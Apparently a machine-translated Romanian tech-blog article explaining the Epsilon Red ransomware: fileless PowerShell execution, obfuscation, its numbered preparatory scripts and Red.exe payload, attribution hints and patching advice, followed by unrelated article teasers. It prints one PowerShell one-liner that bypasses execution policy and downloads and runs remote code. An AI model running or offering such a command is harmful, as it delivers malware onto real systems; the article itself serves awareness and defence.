Ce este ransomware-ul Epsilon Red?

Ți-ai corectat încă serverele ?

O nouă amenințare de tip ransomware , numită Epsilon Red, vizează serverele Microsoft nepatchate din centrele de date ale întreprinderilor. Numit după un răufăcător puțin cunoscut din benzile desenate Marvel, Epsilon Red a fost descoperit recent de o companie de securitate cibernetică numită Sophos. De la descoperirea sa, ransomware-ul a atacat multe organizații din întreaga lume.

Ransomware-ul fără fișiere „se ascunde” în PowerShell

Ransomware fără fișiere este o formă de malware care se execută prin gruparea de software legitim. Malware fără fișiere bazat pe PowerShell folosește capacitatea PowerShell de a se încărca direct în memoria dispozitivului. Această caracteristică ajută la protejarea programelor malware din scripturile PowerShell împotriva detectării.

Într-un scenariu tipic, când se execută un script, acesta trebuie mai întâi scris pe unitatea dispozitivului. Acest lucru permite soluțiilor de securitate pentru punctele finale să detecteze scripturi. Deoarece PowerShell este exclus din procesele standard de execuție a scripturilor, poate ocoli securitatea punctului final. În plus, utilizarea parametrului de ocolire într-un script PowerShell permite unui atacator să eludeze restricțiile scriptului de rețea.

Un exemplu de parametru de ocolire PowerShell este:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

După cum puteți vedea, proiectarea parametrilor de bypass PowerShell este relativ ușoară.

Ca răspuns, Microsoft a lansat un patch pentru a aborda o vulnerabilitate de execuție malware de la distanță legată de PowerShell. Cu toate acestea, plasturii sunt la fel de eficiente pe măsură ce sunt utilizați. Multe organizații au standarde relaxate de corecție, făcând mediile lor vulnerabile la atacuri. Designul lui Epsilon Red este de a profita de acest nivel de vulnerabilitate.

Dubla utilitate a lui Epsilon Red

Deoarece Epsilon Red este cel mai eficient împotriva serverelor Microsoft nepatchizate, malware-ul poate fi folosit ca un ransomware și instrument de identificare. Indiferent dacă Epsilon are sau nu succes într-un mediu, oferă atacatorilor o perspectivă mai bună asupra capacităților de securitate ale țintei lor.

Dacă Epsilon reușește să acceseze Microsoft Exchange Server, aceasta indică faptul că organizația nu urmează cele mai bune practici comune de securitate pentru corecție. Pentru atacator, acest lucru arată cât de ușor poate fi compromis restul mediului țintă de Epsilon.

Epsilon Red folosește Obfuscation pentru a-și ascunde sarcina utilă. Obfuscarea face codul de necitit și este folosit în malware PowerShell pentru a evita lizibilitatea ridicată a scripturilor PowerShell. În caz de ofuscare, cmdleturile alias PowerShell sunt folosite pentru a îngreuna ca software-ul antivirus să identifice scripturile rău intenționate în jurnalele PowerShell.

Ce este ransomware-ul Epsilon Red?

Epsilon Red este cel mai eficient împotriva serverelor Microsoft nepatchate

Cu toate acestea, scripturile PowerShell obscucate pot fi încă identificate. Un semn comun al unui atac iminent PowerShell Script este crearea unui obiect WebClient. Un atacator va crea un obiect WebClient în codul PowerShell pentru a stabili o conexiune externă la o adresă URL de la distanță care conține cod rău intenționat.

Dacă o organizație este atacată, probabilitatea ca aceasta să aibă suficiente măsuri de securitate pentru a detecta scripturile PowerShell obscurcate este foarte scăzută. În schimb, dacă Epsilon Red nu reușește să pătrundă în server, aceasta va indica atacatorului că rețeaua țintei poate decripta rapid malware-ul PowerShell, făcând atacul mai puțin valoros, mai valoros.

Intruziunea cibernetică Epsilon Red

Funcționalitatea lui Epsilon Red este foarte simplă. Software-ul folosește o serie de scripturi Powershell pentru a se infiltra în servere. Aceste scripturi PowerShell sunt numerotate de la 1.ps1 la 12.ps1. Designul fiecărui script PowerShell este de a pregăti un server de destinație pentru încărcarea utilă finală.

Toate scripturile PowerShell din Epsilon Red au propriul lor scop. Unul dintre scripturile PowerShell din Epsilon Red este conceput pentru a rezolva regulile firewall-ului rețelei țintă. Un alt software din această serie conceput pentru a dezinstala software-ul antivirus al țintei .

După cum ați putea ghici, aceste scripturi funcționează sincronizat pentru a se asigura că, odată ce sarcina utilă este livrată, ținta nu poate opri rapid progresul său.

Transmite sarcina utilă

Odată ce scripturile PowerShell ale Epsilon au făcut loc pentru sarcina utilă finală, acesta este distribuit ca extensie, Red.exe . Când intră pe server, Red.exe va scana fișierele serverului și va crea o listă de căi de director pentru fiecare fișier pe care îl detectează. După crearea listei, procesele secundare sunt create din fișierul malware principal pentru fiecare cale de director din listă. Apoi, fiecare subfișier ransomware criptează o cale de director din fișierul listă.

După ce toate căile folderelor din lista Epson au fost criptate, va fi lăsat un fișier .txt pentru a informa ținta și a declara solicitarea atacatorului. În plus, toate nodurile de rețea accesibile conectate la serverul compromis vor fi apoi compromise și probabilitatea ca malware să intre în rețea poate crește.

Cine se află în spatele lui Epsilon Red?

Ce este ransomware-ul Epsilon Red?

Identitățile atacatorilor din spatele Epsilon Red sunt încă necunoscute

Identitățile atacatorilor din spatele Epsilon Red sunt încă necunoscute. Cu toate acestea, unele indicii indică originea atacatorilor. Primul indiciu este numele malware-ului. Epsilon Red este un răufăcător X-Men cu o poveste de origine rusă.

Al doilea indiciu constă în nota de răscumpărare a fișierului .txt pe care codul l-a lăsat în urmă. Este similar cu nota lăsată de o bandă de ransomware numită REvil. Cu toate acestea, această asemănare nu indică faptul că atacatorii erau membri ai acestei bande. REvil operează o operațiune RaaS (Ransomware ca serviciu) în care afiliații plătesc REvil pentru accesul la malware-ul său.

Protejați-vă de Epsilon Red

Până acum, Epsilon Red a pătruns cu succes în serverele nepatchate. Aceasta înseamnă că una dintre cele mai bune protecții împotriva Epsilon Red și a malware-ului ransomware similar este să vă asigurați că mediul dumneavoastră este gestionat corespunzător. În plus, a avea o soluție de securitate care poate decripta rapid scripturile PowerShell ar fi un plus util pentru mediul dumneavoastră.

Lasă un comentariu

Cum să eliminați notificarea de solicitare a drepturilor de autor din colțul din dreapta al ecranului pe Windows 10

Cum să eliminați notificarea de solicitare a drepturilor de autor din colțul din dreapta al ecranului pe Windows 10

Vedeți o notificare de activare a Windows 10 în colțul din dreapta al ecranului? Acest articol vă va ghida cum să ștergeți notificarea de solicitare a drepturilor de autor pe Windows 10.

Instrucțiuni de la AZ despre cum să instalați Windows 10 build 14393.222

Instrucțiuni de la AZ despre cum să instalați Windows 10 build 14393.222

Recent, Microsoft a lansat cea mai recentă actualizare cumulativă pentru utilizatorii de PC Windows 10 numită Build 14393.222. Această actualizare lansată pentru Windows 10 remediază în principal erorile pe baza feedback-ului utilizatorilor și îmbunătățește experiența de performanță a sistemului de operare.

Protejați-vă rețeaua de computere cu gazda Bastion în doar 3 pași

Protejați-vă rețeaua de computere cu gazda Bastion în doar 3 pași

Aveți computere în rețeaua locală care au nevoie de acces extern? Utilizarea unei gazde bastion ca gatekeeper pentru rețeaua dvs. poate fi o soluție bună.

3 moduri de a șterge rapid toate jurnalele de evenimente în Windows 10

3 moduri de a șterge rapid toate jurnalele de evenimente în Windows 10

Uneori, poate fi necesar să ștergeți jurnalele vechi de evenimente dintr-o dată. În acest ghid, Quantrimang.com vă va arăta 3 moduri de a șterge rapid toate jurnalele de evenimente din Windows 10 Event Viewer.

Cum să creați o tastă Windows dacă tastatura nu este disponibilă

Cum să creați o tastă Windows dacă tastatura nu este disponibilă

Dacă preferați să utilizați o tastatură clasică veche, cum ar fi IBM Model M, care nu include o tastă fizică Windows, există o metodă ușoară de a adăuga mai multe, împrumutând o tastă pe care nu o utilizați des.

Cum se creează un mod de fundal transparent pe Windows 10

Cum se creează un mod de fundal transparent pe Windows 10

WindowTop este un instrument care are capacitatea de a estompa toate ferestrele aplicațiilor și programele care rulează pe computere cu Windows 10. Sau puteți utiliza o interfață cu fundal întunecat pe Windows.

Metodele IP false vă ajută să accesați anonim

Metodele IP false vă ajută să accesați anonim

În multe articole anterioare, am menționat că păstrarea anonimatului online este extrem de importantă. Informații private sunt scurse în fiecare an, ceea ce face securitatea online din ce în ce mai necesară. Acesta este și motivul pentru care ar trebui să folosim adrese IP virtuale. Mai jos, vom afla despre metodele de a crea IP-uri false!

Cum să dezactivați bara de limbă pe bara de activități Windows 8

Cum să dezactivați bara de limbă pe bara de activități Windows 8

Bara de limbă din Windows 8 este o bară de instrumente de limbă în miniatură concepută pentru a fi afișată automat pe ecranul desktop. Cu toate acestea, mulți oameni doresc să ascundă această bară de limbă în bara de activități.

Sfaturi pentru a optimiza viteza conexiunii la Internet de la Linksys

Sfaturi pentru a optimiza viteza conexiunii la Internet de la Linksys

Maximizarea vitezei de internet este esențială pentru optimizarea conexiunii la rețea. Puteți avea o experiență optimă de divertisment și de lucru folosind computere, televizoare gata de internet, console de jocuri etc.

Cum se configurează WEP, WPA, WPA2 pentru routerul Linksys

Cum se configurează WEP, WPA, WPA2 pentru routerul Linksys

Conectivitatea wireless este o necesitate astăzi și, din această cauză, securitatea wireless este esențială pentru a asigura siguranța în rețeaua dumneavoastră internă.